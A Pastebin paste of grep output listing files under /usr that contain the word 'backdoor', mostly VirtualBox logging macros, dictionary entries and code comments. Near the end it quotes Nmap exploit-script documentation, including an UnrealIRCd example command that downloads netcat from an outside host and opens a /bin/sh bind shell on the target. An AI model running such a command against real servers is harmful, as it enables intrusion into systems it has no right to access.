Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- grep -Fri backdoor /usr/
- grep: /usr/lib/cups/backend/serial: Permission denied
- /usr/lib/perl5/Net/SSLeay.pod:backdoors, and general suitability for your application.
- Binary file /usr/lib/codecs/drv4.so.6.0 matches
- Binary file /usr/lib/codecs/drv3.so.6.0 matches
- grep: /usr/lib/virtualbox/VBoxNetDHCP: Permission denied
- Binary file /usr/lib/virtualbox/VBoxDD.so matches
- grep: /usr/lib/virtualbox/VBoxNetNAT: Permission denied
- Binary file /usr/lib/virtualbox/VBoxBalloonCtrl matches
- Binary file /usr/lib/virtualbox/VBoxHeadless.so matches
- Binary file /usr/lib/virtualbox/components/VBoxC.so matches
- grep: /usr/lib/virtualbox/VBoxSDL: Permission denied
- Binary file /usr/lib/virtualbox/VBoxDD2.so matches
- Binary file /usr/lib/virtualbox/VBoxPython2_7.so matches
- Binary file /usr/lib/virtualbox/VBoxPython.so matches
- Binary file /usr/lib/virtualbox/VBoxSDL.so matches
- Binary file /usr/lib/virtualbox/VBoxXPCOMC.so matches
- grep: /usr/lib/virtualbox/VBoxNetAdpCtl: Permission denied
- Binary file /usr/lib/virtualbox/VBoxRT.so matches
- grep: /usr/lib/virtualbox/VBoxHeadless: Permission denied
- Binary file /usr/lib/virtualbox/VBoxAuthSimple.so matches
- Binary file /usr/lib/virtualbox/VBoxSVC matches
- Binary file /usr/lib/virtualbox/libvboxjxpcom.so matches
- Binary file /usr/lib/virtualbox/VBoxNetDHCP.so matches
- grep: /usr/lib/virtualbox/VirtualBox: Permission denied
- Binary file /usr/lib/virtualbox/VBoxManage matches
- Binary file /usr/lib/virtualbox/VBoxTestOGL matches
- Binary file /usr/lib/virtualbox/VBoxAutostart matches
- Binary file /usr/lib/virtualbox/VBoxNetNAT.so matches
- Binary file /usr/lib/virtualbox/VirtualBox.so matches
- grep: /usr/lib/virtualbox/VBoxVolInfo: Permission denied
- Binary file /usr/lib/virtualbox/VBoxSharedCrOpenGL.so matches
- Binary file /usr/lib/virtualbox/vboxwebsrv matches
- /usr/lib/python2.7/hmac.py:_secret_backdoor_key = []
- /usr/lib/python2.7/hmac.py: if key is _secret_backdoor_key: # cheap
- /usr/lib/python2.7/hmac.py: other = self.__class__(_secret_backdoor_key)
- Binary file /usr/lib/python2.7/hmac.pyc matches
- /usr/share/sphinx-voxforge-en/lm/voxforge_en_sphinx.cd_cont_3000/voxforge_en_sphinx.dic:backdoor B AE K D AO R
- /usr/share/sphinx-voxforge-en/lm/voxforge_en_sphinx.cd_cont_3000/voxforge_en_sphinx.dic:backdoors B AE K D AO R Z
- /usr/share/perl/5.14.2/CPAN.pm: # backdoor: I could not find a way to record sessions
- /usr/share/perl/5.14.2/Dumpvalue.pm: return if $self->{skipCvGV}; # Backdoor to avoid problems if XS broken...
- /usr/share/perl/5.14.2/dumpvar.pl: return if $skipCvGV; # Backdoor to avoid problems if XS broken...
- /usr/share/perl/5.14.2/CPANPLUS/Dist.pm: ### backdoor method to add more dist types
- /usr/share/perl/5.14.2/CPANPLUS/Dist.pm: ### backdoor method to exclude dist types
- /usr/share/perl/5.14.2/perl5db.pl: return if $skipCvGV; # Backdoor to avoid problems if XS broken...
- /usr/share/aptitude/README.it:le informazioni private o aprono backdoor nel sistema! Se questi pacchetti hanno
- /usr/share/aptitude/README:ssh...versions that steal your private information or open backdoors on your
- /usr/share/doc/libnet-ssleay-perl/copyright: backdoors, and general suitability for your application.
- /usr/share/doc/python-pexpect/examples/bd_client.py:"""This is a very simple client for the backdoor daemon. This is intended more
- grep: /usr/share/doc/google-chrome-stable: Permission denied
- Binary file /usr/share/virtualbox/VBoxGuestAdditions.iso matches
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:/** @name Backdoor Logging
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LOG_TO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LOG_NO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:/** @def LOG_TO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h: * Redirects the normal logging macros to the backdoor versions.
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:/** @def LOG_NO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h: * Disables all LogBackdoor* macros.
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:/** @def LogBackdoor
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h: * Generic logging to the VBox backdoor via port I/O.
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:#if defined(LOG_ENABLED) && !defined(LOG_NO_BACKDOOR)
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LogBackdoor(a) RTLogBackdoorPrintf a
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LogBackdoor(a) do { } while (0)
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:/** @def LogBackdoorFlow
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h: * Logging of execution flow messages to the backdoor I/O port.
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:#if defined(LOG_ENABLED) && !defined(LOG_NO_BACKDOOR)
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LogBackdoorFlow(a) RTLogBackdoorPrintf a
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LogBackdoorFlow(a) do { } while (0)
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:/** @def LogRelBackdoor
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h: * Release logging to the VBox backdoor via port I/O.
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:#if !defined(LOG_NO_BACKDOOR)
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LogRelBackdoor(a) RTLogBackdoorPrintf a
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LogRelBackdoor(a) do { } while (0)
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:#ifdef LOG_TO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define Log(a) LogBackdoor(a)
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LogFlow(a) LogBackdoorFlow(a)
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LogRel(a) LogRelBackdoor(a)
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define _LogIt(a_pvInst, a_fFlags, a_iGroup, ...) LogBackdoor((__VA_ARGS__))
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h: * Prints a formatted string to the backdoor port.
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:RTDECL(size_t) RTLogBackdoorPrintf(const char *pszFormat, ...);
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h: * Prints a formatted string to the backdoor port.
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:RTDECL(size_t) RTLogBackdoorPrintfV(const char *pszFormat, va_list args);
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/mangling.h:# define RTLogBackdoorPrintf RT_MANGLER(RTLogBackdoorPrintf) /* r0drv-guest */
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/mangling.h:# define RTLogBackdoorPrintfV RT_MANGLER(RTLogBackdoorPrintfV) /* r0drv-guest */
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/VBox/log.h: /** VMM Device group for backdoor logging. */
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/VBox/log.h: LOG_GROUP_DEV_VMM_BACKDOOR,
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/VBox/log.h: /** VMM Device group for logging guest backdoor logging to stderr. */
- /usr/share/virtualbox/src/vboxhost/vboxpci/include/VBox/log.h: "DEV_VMM_BACKDOOR", \
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:/** @name Backdoor Logging
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LOG_TO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LOG_NO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:/** @def LOG_TO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h: * Redirects the normal logging macros to the backdoor versions.
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:/** @def LOG_NO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h: * Disables all LogBackdoor* macros.
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:/** @def LogBackdoor
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h: * Generic logging to the VBox backdoor via port I/O.
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:#if defined(LOG_ENABLED) && !defined(LOG_NO_BACKDOOR)
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LogBackdoor(a) RTLogBackdoorPrintf a
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LogBackdoor(a) do { } while (0)
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:/** @def LogBackdoorFlow
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h: * Logging of execution flow messages to the backdoor I/O port.
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:#if defined(LOG_ENABLED) && !defined(LOG_NO_BACKDOOR)
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LogBackdoorFlow(a) RTLogBackdoorPrintf a
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LogBackdoorFlow(a) do { } while (0)
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:/** @def LogRelBackdoor
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h: * Release logging to the VBox backdoor via port I/O.
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:#if !defined(LOG_NO_BACKDOOR)
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LogRelBackdoor(a) RTLogBackdoorPrintf a
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LogRelBackdoor(a) do { } while (0)
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:#ifdef LOG_TO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define Log(a) LogBackdoor(a)
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LogFlow(a) LogBackdoorFlow(a)
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LogRel(a) LogRelBackdoor(a)
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define _LogIt(a_pvInst, a_fFlags, a_iGroup, ...) LogBackdoor((__VA_ARGS__))
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h: * Prints a formatted string to the backdoor port.
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:RTDECL(size_t) RTLogBackdoorPrintf(const char *pszFormat, ...);
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h: * Prints a formatted string to the backdoor port.
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:RTDECL(size_t) RTLogBackdoorPrintfV(const char *pszFormat, va_list args);
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/mangling.h:# define RTLogBackdoorPrintf RT_MANGLER(RTLogBackdoorPrintf) /* r0drv-guest */
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/mangling.h:# define RTLogBackdoorPrintfV RT_MANGLER(RTLogBackdoorPrintfV) /* r0drv-guest */
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/VBox/log.h: /** VMM Device group for backdoor logging. */
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/VBox/log.h: LOG_GROUP_DEV_VMM_BACKDOOR,
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/VBox/log.h: /** VMM Device group for logging guest backdoor logging to stderr. */
- /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/VBox/log.h: "DEV_VMM_BACKDOOR", \
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:/** @name Backdoor Logging
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LOG_TO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LOG_NO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:/** @def LOG_TO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h: * Redirects the normal logging macros to the backdoor versions.
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:/** @def LOG_NO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h: * Disables all LogBackdoor* macros.
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:/** @def LogBackdoor
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h: * Generic logging to the VBox backdoor via port I/O.
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:#if defined(LOG_ENABLED) && !defined(LOG_NO_BACKDOOR)
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LogBackdoor(a) RTLogBackdoorPrintf a
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LogBackdoor(a) do { } while (0)
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:/** @def LogBackdoorFlow
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h: * Logging of execution flow messages to the backdoor I/O port.
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:#if defined(LOG_ENABLED) && !defined(LOG_NO_BACKDOOR)
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LogBackdoorFlow(a) RTLogBackdoorPrintf a
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LogBackdoorFlow(a) do { } while (0)
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:/** @def LogRelBackdoor
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h: * Release logging to the VBox backdoor via port I/O.
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:#if !defined(LOG_NO_BACKDOOR)
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LogRelBackdoor(a) RTLogBackdoorPrintf a
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LogRelBackdoor(a) do { } while (0)
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:#ifdef LOG_TO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define Log(a) LogBackdoor(a)
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LogFlow(a) LogBackdoorFlow(a)
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LogRel(a) LogRelBackdoor(a)
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define _LogIt(a_pvInst, a_fFlags, a_iGroup, ...) LogBackdoor((__VA_ARGS__))
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h: * Prints a formatted string to the backdoor port.
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:RTDECL(size_t) RTLogBackdoorPrintf(const char *pszFormat, ...);
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h: * Prints a formatted string to the backdoor port.
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:RTDECL(size_t) RTLogBackdoorPrintfV(const char *pszFormat, va_list args);
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/mangling.h:# define RTLogBackdoorPrintf RT_MANGLER(RTLogBackdoorPrintf) /* r0drv-guest */
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/mangling.h:# define RTLogBackdoorPrintfV RT_MANGLER(RTLogBackdoorPrintfV) /* r0drv-guest */
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/VBox/log.h: /** VMM Device group for backdoor logging. */
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/VBox/log.h: LOG_GROUP_DEV_VMM_BACKDOOR,
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/VBox/log.h: /** VMM Device group for logging guest backdoor logging to stderr. */
- /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/VBox/log.h: "DEV_VMM_BACKDOOR", \
- /usr/share/virtualbox/src/vboxhost/vboxdrv/r0drv/linux/timer-r0drv-linux.c:static void myLogBackdoorPrintf(const char *pszFormat, ...)
- /usr/share/virtualbox/src/vboxhost/vboxdrv/r0drv/linux/timer-r0drv-linux.c: myLogBackdoorPrintf("\n!!Guest Assertion failed!!\n%s(%d) %s\n%s\n", uLine, pszFile, pszFunction, (pszExpr))
- /usr/share/virtualbox/src/vboxhost/vboxdrv/r0drv/linux/timer-r0drv-linux.c:# define RTAssertMsg2Weak myLogBackdoorPrintf
- /usr/share/virtualbox/src/vboxhost/vboxdrv/r0drv/linux/timer-r0drv-linux.c:# define RTTIMERLNX_LOG(a) myLogBackdoorPrintf a
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:/** @name Backdoor Logging
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LOG_TO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LOG_NO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:/** @def LOG_TO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h: * Redirects the normal logging macros to the backdoor versions.
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:/** @def LOG_NO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h: * Disables all LogBackdoor* macros.
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:/** @def LogBackdoor
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h: * Generic logging to the VBox backdoor via port I/O.
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:#if defined(LOG_ENABLED) && !defined(LOG_NO_BACKDOOR)
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LogBackdoor(a) RTLogBackdoorPrintf a
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LogBackdoor(a) do { } while (0)
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:/** @def LogBackdoorFlow
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h: * Logging of execution flow messages to the backdoor I/O port.
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:#if defined(LOG_ENABLED) && !defined(LOG_NO_BACKDOOR)
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LogBackdoorFlow(a) RTLogBackdoorPrintf a
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LogBackdoorFlow(a) do { } while (0)
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:/** @def LogRelBackdoor
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h: * Release logging to the VBox backdoor via port I/O.
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:#if !defined(LOG_NO_BACKDOOR)
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LogRelBackdoor(a) RTLogBackdoorPrintf a
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LogRelBackdoor(a) do { } while (0)
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:#ifdef LOG_TO_BACKDOOR
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define Log(a) LogBackdoor(a)
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LogFlow(a) LogBackdoorFlow(a)
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LogRel(a) LogRelBackdoor(a)
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define _LogIt(a_pvInst, a_fFlags, a_iGroup, ...) LogBackdoor((__VA_ARGS__))
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h: * Prints a formatted string to the backdoor port.
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:RTDECL(size_t) RTLogBackdoorPrintf(const char *pszFormat, ...);
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h: * Prints a formatted string to the backdoor port.
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:RTDECL(size_t) RTLogBackdoorPrintfV(const char *pszFormat, va_list args);
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/mangling.h:# define RTLogBackdoorPrintf RT_MANGLER(RTLogBackdoorPrintf) /* r0drv-guest */
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/mangling.h:# define RTLogBackdoorPrintfV RT_MANGLER(RTLogBackdoorPrintfV) /* r0drv-guest */
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/VBox/log.h: /** VMM Device group for backdoor logging. */
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/VBox/log.h: LOG_GROUP_DEV_VMM_BACKDOOR,
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/VBox/log.h: /** VMM Device group for logging guest backdoor logging to stderr. */
- /usr/share/virtualbox/src/vboxhost/vboxdrv/include/VBox/log.h: "DEV_VMM_BACKDOOR", \
- /usr/share/virtualbox/src/vboxhost/vboxdrv/common/misc/assert.c: RTLogBackdoorPrintf("\n!!Assertion Failed!!\n"
- /usr/share/virtualbox/src/vboxhost/vboxdrv/common/misc/assert.c: RTLogBackdoorPrintfV(pszFormat, vaCopy);
- /usr/share/virtualbox/src/vboxhost/vboxdrv/VBox/log-vbox.c: * Enables logger output to special backdoor if in guest r0.
- /usr/share/virtualbox/src/vboxhost/vboxdrv/VBox/log-vbox.c: /* The user destination is backdoor logging. */
- /usr/share/mythes/th_en_US_v2.idx:backdoor|1245704
- /usr/share/mythes/th_en_US_v2.dat:(noun)|backdoor|access (generic term)
- /usr/share/mythes/th_en_US_v2.dat:(noun)|backdoor|access (generic term)|access code (generic term)
- /usr/share/mythes/th_en_US_v2.dat:(noun)|backdoor|back entrance|exterior door (generic term)|outside door (generic term)
- /usr/share/mythes/th_en_US_v2.dat:(noun)|back door|backdoor|exterior door (generic term)|outside door (generic term)
- /usr/share/mythes/th_en_US_v2.dat:backdoor|3
- /usr/share/nmap/scripts/script.db:Entry { filename = "ftp-proftpd-backdoor.nse", categories = { "exploit", "intrusive", "malware", "vuln", } }
- /usr/share/nmap/scripts/script.db:Entry { filename = "ftp-vsftpd-backdoor.nse", categories = { "exploit", "intrusive", "malware", "vuln", } }
- /usr/share/nmap/scripts/script.db:Entry { filename = "irc-unrealircd-backdoor.nse", categories = { "exploit", "intrusive", "malware", "vuln", } }
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:Tests for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:(CVE-2011-2523). This script attempts to exploit the backdoor using the
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:the <code>exploit.cmd</code> or <code>ftp-vsftpd-backdoor.cmd</code> script
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse: * http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:-- nmap --script ftp-vsftpd-backdoor -p 21 <host>
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:-- @args exploit.cmd or ftp-vsftpd-backdoor.cmd Command to execute in shell
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:-- | ftp-vsftpd-backdoor:
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:-- | vsFTPd version 2.3.4 backdoor
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:-- | vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:-- | The backdoor was already triggered
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:-- | http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:-- Returns true, results if vsFTPd was backdoored
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:local function check_backdoor(host, shell_cmd, vuln)
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse: "%s: service on port 6200 is not the vsFTPd backdoor: NOT VULNERABLE",
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse: local cmd = stdnse.get_script_args("ftp-vsftpd-backdoor.cmd") or
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse: title = "vsFTPd version 2.3.4 backdoor",
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.]],
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html',
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse: -- check to see if the vsFTPd backdoor was already triggered
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse: local status, ret = check_backdoor(host, cmd, vsftp_vuln)
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse: -- check if vsFTPd was backdoored
- /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse: status, ret = check_backdoor(host, cmd, vsftp_vuln)
- /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse:Tests for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562. This script attempts to exploit the backdoor using the innocuous <code>id</code> command by default, but that can be changed with the <code>ftp-proftpd-backdoor.cmd</code> script argument.
- /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse:-- nmap --script ftp-proftpd-backdoor -p 21 <host>
- /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse:-- @args ftp-proftpd-backdoor.cmd Command to execute in shell (default is
- /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse:-- | ftp-proftpd-backdoor:
- /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse:-- | This installation has been backdoored.
- /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse: cmd = stdnse.get_script_args("ftp-proftpd-backdoor.cmd")
- /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse: stdnse.print_debug(1, "This version is not known to be backdoored.")
- /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse: "This installation has been backdoored.",
- /usr/share/nmap/scripts/smb-psexec.nse:system, or even installing a backdoor on a collection of computers.
- /usr/share/nmap/scripts/smb-psexec.nse:or it can upload a program and run it, such as pwdump6 or a backdoor. Additionally, it
- /usr/share/nmap/scripts/smb-psexec.nse:generates a file), or it can just start the process and let it run headless (a backdoor
- /usr/share/nmap/scripts/smb-psexec.nse:* <code>headless</code> (boolean) If <code>headless</code> is set to true, the program doesn't return any output; rather, it runs detached from the service so that, when the service ends, the program keeps going. This can be useful for, say, a monitoring program. Or a backdoor, if that's what you're into (a Metasploit payload should work nicely). Not compatible with: <code>find</code>, <code>remove</code>, <code>noblank</code>, <code>replace</code>, <code>maxtime</code>, <code>outfile</code>.
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse:Checks if an IRC server is backdoored by running a time-based command (ping)
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse:The <code>irc-unrealircd-backdoor.command</code> script argument can be used to
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: $ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' <target>
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse:<code>irc-unrealircd-backdoor.kill</code> script argument can be passed, which
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse:* http://www.metasploit.com/modules/exploit/unix/irc/unreal_ircd_3281_backdoor
